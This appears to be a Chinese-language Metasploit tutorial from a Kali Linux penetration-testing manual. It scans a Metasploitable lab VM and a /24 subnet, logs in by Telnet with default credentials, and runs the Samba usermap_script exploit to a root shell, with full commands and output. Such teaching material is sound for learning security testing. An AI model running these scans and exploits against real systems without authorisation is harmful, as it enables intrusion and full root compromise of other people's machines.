Kali系统metasploit使⽤教程
基础配置
由于kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的⽅式不起作⽤。
在kali 2.0中启动带数据库⽀持的MSF⽅式如下:
1 ⾸先启动postgresql数据库:
/etc/init.d/postgresql start;或者 service postgresql start;
2 初始化MSF数据库(关键步骤!):msfdb init;(如不能初始化,就⽤msfdb reinit试试吧!默认创建的数据库名:msf,msf_test;⽤户名:msf;⼝令默认为空)
3 运⾏msfconsole:msfconsole;
4 在msf中查看数据库连接状态:db_status。
5更新metasploit:msfupdate(我的更新,暂未成功,应该是源的问题!)
6设置启动⾃动启动msf和postgresql:
update-rc.d postgresql enable
update-rc.d metasploit enable
好了,现在我们来试试,怎么⽤吧!
在Metasploit中扫描
在Metasploit中,附带了⼤量的内置扫描器。使⽤这些扫描器可以搜索并获得来⾃⼀台计算机或⼀个完整⽹络的服务信息。本节将介绍使⽤Metasploit中的辅助模块实现扫描。
【实例4-4】在Metasploit中,扫描⽬标主机。具体操作步骤如下所⽰:
(1)启动MSF终端。执⾏命令如下所⽰:
root@kali:~# msfconsole
msf>
(2)搜索所有可⽤的扫描模块。执⾏命令如下所⽰:
msf > search scanner
Matching Modules
Name Disclosure Date Rank Description
—- ——————– ———– ———————————————
auxiliary/admin/smb/check_dir_file normal SMB Scanner Check File/Directory Utility
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/gather/citrix_published_applications normal Citrix MetaFrame ICA Published Applications Scanner
auxiliary/gather/enum_dns normal DNS Record Scanner and Enumerator
auxiliary/gather/natpmp_external_address normal NAT-PMP External Address Scanner
auxiliary/gather/windows_deployment_services_shares normal Microsoft Windows Deployment Services Unattend Gatherer
auxiliary/pro/nexpose normal PRO: Nexpose Scanner Integration
auxiliary/pro/webscan normal PRO: Web Application Scanner
auxiliary/scanner/afp/afp_login normal Apple Filing Protocol Login Utility
auxiliary/scanner/afp/afp_server_info normal Apple Filing Protocol Info Enumerator
auxiliary/scanner/backdoor/energizer_duo_detect normal Energizer DUO Trojan Scanner
auxiliary/scanner/chargen/chargen_probe 1996-02-08 normal Chargen Probe Utility
输出信息显⽰了,Metasploit中所有可⽤的扫描模块。这些模块针对各种类型的服务。这⾥为了缩⼩查看的范围,搜索SSH服务的扫描模块。
(3)扫描SSH服务的扫描模块。执⾏命令如下所⽰:
msf > search scanner/ssh
Matching Modules
Name Disclosure Date Rank Description
—- ————— ———– ——————————————-
auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal Cerberus FTP Server SFTP Username Enumeration
auxiliary/scanner/ssh/ssh_enumusers normal SSH Username Enumeration
auxiliary/scanner/ssh/ssh_identify_pubkeys normal SSH Public Key Acceptance Scanner
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
auxiliary/scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner
auxiliary/scanner/ssh/ssh_version normal SSH Version Scanner
输出的信息,显⽰了⼏个有效的SSH模块。现在就可以选择相应的模块,进⾏扫描了。
(4)使⽤ssh_version模块扫描SSH服务。执⾏命令如下所⽰:
msf > use auxiliary/scanner/ssh/ssh_version
(5)查看ssh_version模块下可配置的选项参数。执⾏命令如下所⽰:
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
———— ————— ——– —————————————————————————–
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
输出的信息显⽰了可配置的模块。从以上结果中,可以看出RHOSTS选项没有配置。
(6)配置RHOSTS选项。执⾏命令如下所⽰:
msf auxiliary(ssh_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
从输出的结果中,可以看到RHOSTS(⽬标主机地址)选项已经设置为192.168.6.105(Metasploit 2操作系统)。
(7)启动扫描。执⾏命令如下所⽰:
msf auxiliary(ssh_version) > exploit
[*] 192.168.6.105:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) >
从输出的信息中,可以看到⽬标系统正运⾏SSH服务,并且版本为SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1。
【实例4-5】扫描MySQL服务器。具体操作步骤如下所⽰:
(1)登录MSF终端。执⾏命令如下所⽰:
root@kali:~# msfconsole
msf>
(2)使⽤mysql_version模块,并查看该模块中可配置的选项参数。执⾏命令如下所⽰:
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
从输出的信息中,可以看到RHOSTS选项没有配置。此时,配置RHOSTS来指定⽬标主机的地址。
(3)设置RHOSTS选项,并进⾏MySQL服务扫描。执⾏命令如下所⽰:
msf auxiliary(mysql_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
msf auxiliary(mysql_version) > exploit
[*] 192.168.6.105:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
从输出的结果中,可以看到⽬标主机上正在运⾏的MySQL版本是5.0.51a。
【实例4-6】扫描Telnet服务。具体操作步骤如下所⽰:
(1)启动MSF终端。执⾏命令如下所⽰:
root@kali:~# msfconsole
msf>
(2)使⽤telnet_version模块,并查看可配置的选项参数。执⾏命令如下所⽰:
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options
Module options (auxiliary/scanner/telnet/telnet_version):
Name Current Setting Required Description
—- ————— ————— ———————————————————————–
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the Telnet probe
USERNAME no The username to authenticate as
从输出的信息中,可以看到有四个必须配置选项。其中三个选项已经配置,现在配置RHOSTS选项。
(3)配置RHOSTS选项,并启动扫描。执⾏命令如下所⽰:
msf auxiliary(telnet_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
msf auxiliary(telnet_version) > exploit
[*] 192.168.6.105:23 TELNET _ _ _ _ _ _ _ \x0a _ | | _ _ _ | | _ () || |_ | | | \ \x0a| ‘_ _ \ / _ \ __/ _ / | ‘_ | |/ _ | | / ` | ‘ | |/ _ \ ) |\x0a| | | | | | / || (| _ \ |) | | () | | || (| | |) | | // / \x0a|| || ||__|____,|/ ./||__/||___,|./||_||\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact:
msfdev[at]metasploit\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploit
able login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
从以上输出的信息,仅看到⼀堆⽂本信息。在这些信息中,没有关于Telnet服务的版本信息。但是显⽰了登录认证信息,Login with msfadmin/msfadmin to get started。从这条信息中,可以获取到⽬标主机Telnet服务的⽤户名和密码。此时可以尝试登录。
(4)登录⽬标主机的Telnet服务。执⾏命令如下所⽰:
root@kali:~# telnet -l msfadmin 192.168.6.105
Trying 192.168.6.105…
Connected to 192.168.6.105.
Escape character is ‘^]’.
Password: #输⼊密码msfadmin
Last login: Tue Jul 8 06:32:46 EDT 2014 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
enum怎么用Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
No mail.
msfadmin@metasploitable:~提⽰符,则表⽰成功登录了Telnet 服务。此时可以执⾏⼀些标准的Linux命令。例如查看多个组的成员,执⾏命令如下所⽰:
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)输出信息中显⽰了msfadmin⽤户的相关信息。其中,gid表⽰groups中第1个组账号为该⽤户的基本组,groups中的其他组账号为该⽤户的附加组。
在Metasploit中,可以扫描⼀系列地址。下⾯以扫描Samba服务器为例,介绍扫描⼀个⽹络内运⾏的Samba服务器。⾸先演⽰下,扫描单个地址的Samba服务器。
【实例4-7】演⽰⽬标扫描主机地址为192.168.6.105的Samba服务器。具体操作步骤如下所⽰:
(1)启动MSF终端。执⾏命令如下所⽰:
root@kali:~# msfconsole
msf>
(2)使⽤smb_version模块,并查看该模块可配置的选项参数。执⾏命令如下所⽰:
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
—- ————— ———– ———————————————————————–
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
(3)配置RHOSTS选项。执⾏命令如下所⽰:
msf auxiliary(smb_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
(4)启动扫描。执⾏命令如下所⽰:
msf auxiliary(smb_version) > exploit
[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
从输出的信息中,可以看到扫描到正在运⾏的Samba服务器及其版本。
接下来演⽰扫描192.168.6.0/24⽹络内所有运⾏Sambas服务器的主机。具体操作步骤如下所⽰:
(1)选择使⽤smb_version模块。执⾏命令如下所⽰:
msf > use auxiliary/scanner/smb/smb_version
(2)配置smb_version模块中可配置的选项参数。执⾏命令如下所⽰:
msf auxiliary(smb_version) > set RHOSTS 192.168.6.0/24
RHOSTS => 192.168.6.0/24
msf auxiliary(smb_version) > set THREADS 255
THREADS => 255
(3)启动扫描。执⾏命令如下所⽰:
msf auxiliary(smb_version) > exploit
[*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:WIN-RKPKQFBLG6C) (domain:WORKGROUP) [*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] 192.168.6.104:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:LYW) (domain:LYW)
[*] 192.168.6.110:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:AA-886OKJM26FSW) (domain:WORKGROUP) [*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
从输出的信息中,可以看到192.168.6.0/24⽹络内有四台主机上正在运⾏着Samba服务器。在显⽰的信息中,可以看到运⾏Samba服务器的操作系统类型。
【实例4-8】渗透攻击Samba服务器。具体操作步骤如下所⽰:
(1)启动MSF终端。执⾏命令如下所⽰:
root@kali:~# msfconsole
msf>
(2)搜索usermap模块。执⾏命令如下所⽰:
msf > search samba/usermap
Matching Modules
Name Disclosure Date Rank Description
—- ————— ———– ———————————————–
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba “username map script” Command Execution
从输出的信息中,可以看到有个usermap模块。
(3)查看usermap_script模块的详细信息。执⾏命令如下所⽰:
msf > info exploit/multi/samba/usermap_script
Name: Samba “username map script” Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck
Available targets:
Id Name
0 Automatic
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 139 yes The target port
Payload information:
Space: 1024
Description:
This module exploits a command execution vulerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
“username map script” configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!
References:
输出的信息显⽰了usermap_script模块的详细信息。从输出信息中可以看到,该模块仅需要配置RHOST选项就可以了。这⾥不需要加载任何攻击载荷,就可以⾃动使⽤⼀个Linux命令Shell。
(3)选择使⽤usermap_script模块,并设置RHOST选项。执⾏命令如下所⽰:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.6.105
RHOST => 192.168.6.105
(4)启动渗透攻击。执⾏命令如下所⽰:
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo IwmN37I0D3cTGJhv;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “IwmN37I0D3cTGJhv\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:34848) at 2014-07-16 10:00:59 +0800
从输出的信息中,可以看到成功的打开了⼀个会话。这表⽰已成功攻击了⽬标主机。此时⽤户可以执⾏⼀些Linux命令,查看⽬标主机的相关信息。如下所⽰:whoami #查看当前登录系统的⽤户
root
从输出的信息中,可以看到当前⽬标系统登录的⽤户名是root。如果想了解该⽤户的详细信息,可以使⽤id命令查看。如下所⽰:
id #查看当前登录⽤户的信息
uid=0(root) gid=0(root)
输出的信息表上root⽤户属于root组,并且其UID和GID都为0。
本⽂选⾃:Kail Linux渗透测试实训⼿册⼤学霸内部资料,转载请注明出处,尊重技术尊重IT⼈!
稍有差异,还请指正!
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论